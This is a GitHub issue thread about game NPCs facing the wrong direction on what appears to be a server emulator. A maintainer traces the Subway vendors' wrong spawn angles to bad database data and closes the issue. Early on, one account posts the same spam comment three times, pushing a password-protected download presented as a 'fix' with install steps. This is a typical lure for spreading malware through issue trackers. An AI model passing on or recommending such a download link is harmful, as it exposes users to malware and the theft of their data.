### ISSUE TITLE
NPCs are facing the wrong direction

### ISSUE THREAD

**Issue by Dezzyx** [project-rubika/issues#808] opened 2024-08-27 02:21 UTC
Describe the bug

NPCs are facing the wrong direction. It seemed to happen right after the recent update, as I was standing by an NPC and after that his direction had changed. I checked several NPCs and it's the same.

To Reproduce

1. Go to an NPC
2. See them face incorrect direction

Expected behavior

For NPCs to face the proper direction

Screenshots

![Screenshot 2024-08-27 041838](https://github.com/user-attachments/assets/eeff0863-f64f-4e94-8e5c-e3b24c307935)

![Screenshot 2024-08-27 014607](https://github.com/user-attachments/assets/de93c871-bde3-4b43-aee8-0b0d2750975c)

![Screenshot 2024-08-27 005855](https://github.com/user-attachments/assets/36e9cd4c-b358-4d85-b4d7-c1bda686d007)

**Comment by jia6214876** [comment] 2024-08-27 02:22
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 02:23
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 02:23
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RaggyLP** [comment] 2024-08-27 19:55
Could you elaborate further on what you mean by facing the 'wrong' direction? As it is currently, most NPCs will turn to face the player when interacted with, however, there isn't any 'right' way for them to generally face.

**Comment by Starbouy138** [comment] 2024-08-27 21:02
I can add to this, that the Shops NPC's in the Subway are mostly facing weird directions and don't turn to face you when opening Dialogue as of this past weekend. I did notice that alot of NPC positioning was recently fixed, but these persisted.

**Comment by Dezzyx** [comment] 2024-08-27 23:14
If you look at this compared to the screenshot included in my original post, the NPCs are facing a different direction. 

![Screenshot 2024-08-28 005723](https://github.com/user-attachments/assets/49917c85-df12-4370-bd76-82b20db9d039)

They were back to normal today, however. As for Bobic, I think he should be facing me from where I stand in the screenshot, but I saw him again today and he stands like that, facing East. If I click him, he faces me. Then I relogged, and now he was facing me without clicking him first. Not entirely sure what's going on.

**Comment by prkdrake** [comment] 2024-08-28 10:01
(Some) NPCs turn when you talk to them, so other players can talk to them, turn them to face the “wrong” direction, then run off, leaving the poor NPC staring at a wall. 

Some NPCs do not turn at all, however. 

Questions that need to be answered:

1. a) If another player talks to an NPC who turns on Live, does the NPC turn for everyone, or is the turn only visible to the NPC’s interlocutor? If so: b) does the NPC maintain their bearing after logging out and back in, or is it reset?

2. Are we incorrectly applying default bearing when NPCs are spawned, either by a) hash point or b) regional spawn?

**Comment by Dezzyx** [comment] 2024-08-29 05:18
After finding a volunteer to help me on Live I'm able to partly answer this:

1. When me, or the other player talked to the NPC, the NPC turning was visible to both.
2. Then we relogged, and when we came back on the NPC had maintained their bearing.
3. Ehm... what would Jesus do? (yeah I got nothin')

**Comment by prkdrake** [comment] 2024-08-29 06:58
for #2, when you say they maintained their bearing, do you mean that if you made them face towards a wall by talking to them, logging out, then when you logged back in they’d be facing the wall, still?

**Comment by Dezzyx** [comment] 2024-08-29 17:53
@prkdrake Yes that is what I mean. Whatever direction you turn him, when you log out and back in, he's still facing the way you turned him.

I'm not sure if there was any doubt about this but it also seems obvious that an NPC has a default position they "should" face. Which for Des Morck in this case, is clearly forward in his couch seat, or else it looks off. Not to say he "shouldn't" turn if you face him from say, his left, if the intended mechanic is to have him face the player that makes sense. You can ask though, did they mean for the NPC not to turn back to his default after? This NPC is a good example cause he looks way off in the couch facing any way but forward, no one sits like that. Forward is also how I always find him, which may then be cause he was turned that way last, but it also is likely because that is the way players naturally approach him. Even if NPCs do face the player, I'm not sure it makes sense for a player to direct how the NPC should stay after they're done talking.

**Comment by prkdrake** [comment] 2024-08-29 18:20
We're just trying to match live - if you've seen NPCs return to some default bearing after some delay then feel free to provide it. 

I have confirmed that the Subway vendors are spawning with invalid bearings. Investigating that now. Graham Simmons, Annie Kingsglade, Inventor Bobic and Des Morck are all spawning with the correct bearing. I did not check Sam Chin.

**Comment by prkdrake** [comment] 2024-08-29 18:53
Subway vendor NPCs appear to be spawning incorrectly due to a data issue - they just have the wrong angles on their spawn points, which comes from the RDB. I am going to raise a new issue for that issue specifically and close this one.

**Comment by prkdrake** [comment] 2024-08-29 18:58
Closing this as wontfix as the behaviour described in the original ticket appears to match that of the live server.

**Closed by prkdrake** 2024-08-29 18:58 UTC
Labels: wontfix
